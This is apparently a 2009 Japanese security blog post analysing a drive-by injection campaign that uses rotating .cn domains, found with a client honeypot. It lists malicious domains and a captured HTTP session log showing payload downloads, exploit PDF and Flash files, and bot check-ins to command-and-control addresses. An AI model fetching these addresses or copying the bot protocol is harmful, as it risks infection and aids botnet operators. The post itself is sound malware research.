cnドメインを利用したインジェクション 検体編
Published: 2009/06/19
TTTT@初投稿です。
国内 Web サービスが扱っている URL 情報にマルウェア感染を引き起こすものがあるかクライアントハニーポットで調査していたら、jyakeさんと同じく「cnドメインを利用したインジェクション 8080 + index.php型」を発見しました。
ドメインは、 filmoflife.cn, bigtopstats.cn など調査するたびに変わってました。cn ドメインをロードさせる iframe を特定できず、特徴的なタグは未確認です。
クライアントハニーポットで収集できた検体4つ。アンチウイルスでの検知率は低いです。特に beep.sys が気になります。
トーレスログcninjesample.txt
感染前後のHTTPセッション
GET http://77.37.19.179/index.php text/html GET http://77.37.19.179/index.php text/html GET http://77.37.19.179/load.php?id=0 application/octet-stream GET http://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=2900227141&rnd=981633 text/html; GET http://78.109.29.116/new/controller.php?action=report&guid=0&rnd=123&uid=1&entity=1241530597:unique_start;1243627542:unique_start text/html; POST http://78.109.29.114/good/receiver/online text/html; GET http://77.37.19.179/cache/readme.pdf application/pdf GET http://77.37.19.179/cache/flash.swf application/x-shockwave-flash GET http://77.37.19.179/cache/readme.pdf application/pdf GET http://77.37.19.179/cache/flash.swf application/x-shockwave-flash GET http://78.109.29.116/new/controller.php?action=bot&entity_list=1241530597,1243627542&uid=1&first=1&guid=2900227141&rnd=981633 text/html; GET http://78.109.29.116/new/controller.php?action=report&guid=0&rnd=123&uid=1&entity=1241530597:repeat_start text/html; POST http://78.109.29.114/good/receiver/online text/html;
あからさまな HTTPボットのような感じがします。
by TTTT